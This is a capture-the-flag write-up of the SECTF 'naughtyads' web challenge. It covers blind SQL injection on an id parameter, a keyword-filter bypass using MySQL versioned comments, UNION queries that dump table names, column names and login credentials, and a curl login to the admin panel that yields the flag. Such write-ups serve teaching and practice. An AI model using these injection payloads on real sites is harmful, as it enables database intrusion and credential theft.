[Web] SECTF - naughtyads

Web blindsqli, filterbypass, httpauth, sqlinjection, web Comments


Naughty ads - Web (200 + 0)

Can you put agent Gill in the naughty ad section? His phone number is “555-31338”

Solves: 122

Service: http://naughtyads.alieni.se/

Author: avlidienbrunn

Checking in robots.txt we have a hidden directory called admin, but there is a http authentication and we don’t know the user and the password, we need to find a vulnerability to get the credentials.

Finding the vulnerability

Another Sql injection after some searching I found a GET param vulnerable to blind SQLi

Successful query that returns content :

1
http://naughtyads.alieni.se?id=3ad3-46c3-b975' AND 1 AND 'A'='A

Unsuccessful query that returns nothing :

1
http://naughtyads.alieni.se?id=3ad3-46c3-b975' AND 1 AND 'A'='B

Bypassing filters

Now there is some kind of protection, there is a filter blacklisting alot of SQL words, one way of bypassing it is by doing this:

1
2
// bypasses or filter
http://naughtyads.alieni.se?id=3ad3-46c3-b975' /*!50000or*/ 1 AND 'A'='A

Performing Union Injections

Getting Table names:

1
http://naughtyads.alieni.se/?id=3ad3-46c3-b97' /*!50000union*/ /*!50000all*/ /*!50000select*/ group_concat(table_name) /*!50000from*/ information_schema.tables /*!50000where*/ table_schema=database() AND '1'='1

Getting Columns names:

1
http://naughtyads.alieni.se/?id=3ad3-46c3-b97' /*!50000union*/ /*!50000all*/ /*!50000select*/ group_concat(column_name) /*!50000from*/ information_schema.columns /*!50000where*/ table_schema=database() AND '1'='1

Getting the Username and password

1
http://naughtyads.alieni.se/?id=3ad3-46c3-b97' /*!50000union*/ /*!50000all*/ /*!50000select*/ group_concat(name, " ", password) /*!50000from*/ login /*!50000where*/ '1'='1

After searching in google the hash 5ebe2294ecd0e0f08eab7690d2a6ee69 is secret

Admin Login

We have a simple form with a image upload well if we remember the challenge description:

1
Can you put agent Gill in the naughty ad section? His phone number is "555-31338"

So lets put the number and submit the form:

1
2
$ curl 'http://naughtyads.alieni.se/admin/' --user webmasterofdoom3755:secret --data 'phone=555-31338'
SECT{~tr4nsv3stiT3s_w3lc0me_t00~}

And we got the flag!!!

TeamRocketISTCTF Team

Portuguese Computer Science Students